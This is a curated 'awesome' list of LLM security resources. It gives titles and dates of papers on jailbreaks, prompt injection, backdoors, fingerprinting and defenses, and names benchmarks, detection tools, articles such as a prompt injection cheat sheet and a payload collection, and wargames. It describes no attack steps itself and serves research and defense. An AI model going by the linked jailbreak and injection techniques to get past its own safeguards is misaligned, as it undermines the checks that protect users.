awesome-llm-security

LLM Security Resources

Curation of resources and tools related to security vulnerabilities in large language models.

A curation of awesome tools, documents and projects about LLM Security.

GitHub

956 stars
32 watching
94 forks
last commit: 3 days ago
Linked from 2 awesome lists

awesomeawesome-listllmsecurity

Awesome LLM Security / Papers / White-box attack

[paper] "Visual Adversarial Examples Jailbreak Large Language Models", 2023-06, AAAI(Oral) 24, ,
[paper] "Are aligned neural networks adversarially aligned?", 2023-06, NeurIPS(Poster) 23, ,
[paper] "(Ab)using Images and Sounds for Indirect Instruction Injection in Multi-Modal LLMs", 2023-07,
[paper] "Universal and Transferable Adversarial Attacks on Aligned Language Models", 2023-07, ,
[paper] "Jailbreak in pieces: Compositional Adversarial Attacks on Multi-Modal Language Models", 2023-07, ,
[paper] "Image Hijacking: Adversarial Images can Control Generative Models at Runtime", 2023-09, ,
[paper] "Weak-to-Strong Jailbreaking on Large Language Models", 2024-04, ,

Awesome LLM Security / Papers / Black-box attack

[paper] "Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection", 2023-02, AISec@CCS 23
[paper] "Jailbroken: How Does LLM Safety Training Fail?", 2023-07, NeurIPS(Oral) 23,
[paper] "Latent Jailbreak: A Benchmark for Evaluating Text Safety and Output Robustness of Large Language Models", 2023-07,
[paper] "Effective Prompt Extraction from Language Models", 2023-07, ,
[paper] "Multi-step Jailbreaking Privacy Attacks on ChatGPT", 2023-04, EMNLP 23, ,
[paper] "LLM Censorship: A Machine Learning Challenge or a Computer Security Problem?", 2023-07,
[paper] "Jailbreaking chatgpt via prompt engineering: An empirical study", 2023-05,
[paper] "Prompt Injection attack against LLM-integrated Applications", 2023-06,
[paper] "MasterKey: Automated Jailbreak Across Multiple Large Language Model Chatbots", 2023-07, ,
[paper] "GPT-4 Is Too Smart To Be Safe: Stealthy Chat with LLMs via Cipher", 2023-08, ICLR 24, ,
[paper] "Use of LLMs for Illicit Purposes: Threats, Prevention Measures, and Vulnerabilities", 2023-08,
[paper] "Do-Not-Answer: A Dataset for Evaluating Safeguards in LLMs", 2023-08,
[paper] "Detecting Language Model Attacks with Perplexity", 2023-08,
[paper] "Open Sesame! Universal Black Box Jailbreaking of Large Language Models", 2023-09, ,
[paper] "Fine-tuning Aligned Language Models Compromises Safety, Even When Users Do Not Intend To!", 2023-10, ICLR(oral) 24,
[paper] "AutoDAN: Generating Stealthy Jailbreak Prompts on Aligned Large Language Models", 2023-10, ICLR(poster) 24, , ,
[paper] "Jailbreak and Guard Aligned Language Models with Only Few In-Context Demonstrations", 2023-10, CoRR 23, ,
[paper] "Multilingual Jailbreak Challenges in Large Language Models", 2023-10, ICLR(poster) 24,
[paper] "Scalable and Transferable Black-Box Jailbreaks for Language Models via Persona Modulation", 2023-11, SoLaR(poster) 24,
[paper] "DeepInception: Hypnotize Large Language Model to Be Jailbreaker", 2023-11,
[paper] "A Wolf in Sheep’s Clothing: Generalized Nested Jailbreak Prompts can Fool Large Language Models Easily", 2023-11, NAACL 24,
[paper] "AutoDAN: Automatic and Interpretable Adversarial Attacks on Large Language Models", 2023-10,
[paper] "Language Model Inversion", 2023-11, ICLR(poster) 24,
[paper] "An LLM can Fool Itself: A Prompt-Based Adversarial Attack", 2023-10, ICLR(poster) 24,
[paper] "GPTFUZZER: Red Teaming Large Language Models with Auto-Generated Jailbreak Prompts", 2023-09,
[paper] "Many-shot Jailbreaking", 2024-04,
[paper] "Rethinking How to Evaluate Language Model Jailbreak", 2024-04,

Awesome LLM Security / Papers / Backdoor attack

[paper] "BITE: Textual Backdoor Attacks with Iterative Trigger Injection", 2022-05, ACL 23,
[paper] "Prompt as Triggers for Backdoor Attack: Examining the Vulnerability in Language Models", 2023-05, EMNLP 23,
[paper] "Backdooring Instruction-Tuned Large Language Models with Virtual Prompt Injection", 2023-07, NAACL 24,

Awesome LLM Security / Papers / Fingerprinting

[paper] "Instructional Fingerprinting of Large Language Models", 2024-01, NAACL 24
[paper] "TRAP: Targeted Random Adversarial Prompt Honeypot for Black-Box Identification", 2024-02, ACL 24 (findings)
[paper] "LLMmap: Fingerprinting For Large Language Models", 2024-07,

Awesome LLM Security / Papers / Defense

[paper] "Baseline Defenses for Adversarial Attacks Against Aligned Language Models", 2023-09,
[paper] "LLM Self Defense: By Self Examination, LLMs Know They Are Being Tricked", 2023-08, ICLR 24 Tiny Paper, ,
[paper] "Defending Against Alignment-Breaking Attacks via Robustly Aligned LLM", 2023-09, ,
[paper] "Benchmarking and Defending Against Indirect Prompt Injection Attacks on Large Language Models", 2023-12,
[paper] "AutoDefense: Multi-Agent LLM Defense against Jailbreak Attacks", 2024-03,
[paper] "Protecting Your LLMs with Information Bottleneck", 2024-04,
[paper] "PARDEN, Can You Repeat That? Defending against Jailbreaks via Repetition", 2024-05, ICML 24,
[paper] “Adversarial Tuning: Defending Against Jailbreak Attacks for LLMs”, 2024-06,
[paper] "Improving Alignment and Robustness with Circuit Breakers", 2024-06, NeurIPS 24, ,

Awesome LLM Security / Papers / Platform Security

[paper] "LLM Platform Security: Applying a Systematic Evaluation Framework to OpenAI’s ChatGPT Plugins", 2023-09,

Awesome LLM Security / Papers / Survey

[paper] "Survey of Vulnerabilities in Large Language Models Revealed by Adversarial Attacks", 2023-10, ACL 24,
[paper] "Security and Privacy Challenges of Large Language Models: A Survey", 2024-02,
[paper] "Breaking Down the Defenses: A Comparative Survey of Attacks on Large Language Models", 2024-03,
[paper] "Operationalizing a Threat Model for Red-Teaming Large Language Models (LLMs)", 2024-07,

Awesome LLM Security / Benchmark

[paper] "JailbreakBench: An Open Robustness Benchmark for Jailbreaking Large Language Models", 2024-03,
[paper] "AgentDojo: A Dynamic Environment to Evaluate Attacks and Defenses for LLM Agents", 2024-06, NeurIPS 24,
[paper] "AgentHarm: A Benchmark for Measuring Harmfulness of LLM Agents", 2024-10,

Awesome LLM Security / Tools

Plexiglass 121 11 months ago : a security toolbox for testing and safeguarding LLMs
PurpleLlama 2,716 23 days ago : set of tools to assess and improve LLM security
Rebuff 1,124 4 months ago : a self-hardening prompt injection detector
Garak 1,471 8 days ago : a LLM vulnerability scanner
LLMFuzzer 231 10 months ago : a fuzzing framework for LLMs
LLM Guard 1,242 about 1 month ago : a security toolkit for LLM Interactions
Vigil 309 10 months ago : a LLM prompt injection detection toolkit
jailbreak-evaluation 19 19 days ago : an easy-to-use Python package for language model jailbreak evaluation
Prompt Fuzzer 401 about 1 month ago : the open-source tool to help you harden your GenAI applications
WhistleBlower 111 4 months ago : open-source tool designed to infer the system prompt of an AI agent based on its generated text outputs

Awesome LLM Security / Articles

Hacking Auto-GPT and escaping its docker container
Prompt Injection Cheat Sheet: How To Manipulate AI Language Models
Indirect Prompt Injection Threats
Prompt injection: What’s the worst that can happen?
OWASP Top 10 for Large Language Model Applications
PoisonGPT: How we hid a lobotomized LLM on Hugging Face to spread fake news
ChatGPT Plugins: Data Exfiltration via Images & Cross Plugin Request Forgery
Jailbreaking GPT-4's code interpreter
Securing LLM Systems Against Prompt Injection
The AI Attack Surface Map v1.0
Adversarial Attacks on LLMs
How Anyone can Hack ChatGPT - GPT4o
LLM Evaluation metrics, frmaework, and checklist
How RAG Poisoning Made Llama3 Racist!

Awesome LLM Security / Other Awesome Projects

https://0din.ai (0din GenAI Bug Bounty from Mozilla)( ): The 0Day Investigative Network is a bug bounty program focusing on flaws within GenAI models. Vulnerability classes include Prompt Injection, Training Data Poisoning, DoS, and more
Gandalf : a prompt injection wargame
LangChain vulnerable to code injection - CVE-2023-29374
LLM Security startups 1 15 days ago
Adversarial Prompting
Epivolis : a prompt injection aware chatbot designed to mitigate adversarial efforts
LLM Security Problems at DEFCON31 Quals 123 over 1 year ago : the world's top security competition
PromptBounty.io
PALLMs (Payloads for Attacking Large Language Models) 64 5 months ago

Awesome LLM Security / Other Useful Resources

@llm_sec Twitter:
LLM Security Blog: authored by
Embrace The Red Blog:
Kai's Blog Blog:
AI safety takes Newsletter:
Hackstery Newsletter & Blog:

Backlinks from these awesome lists:

More related projects: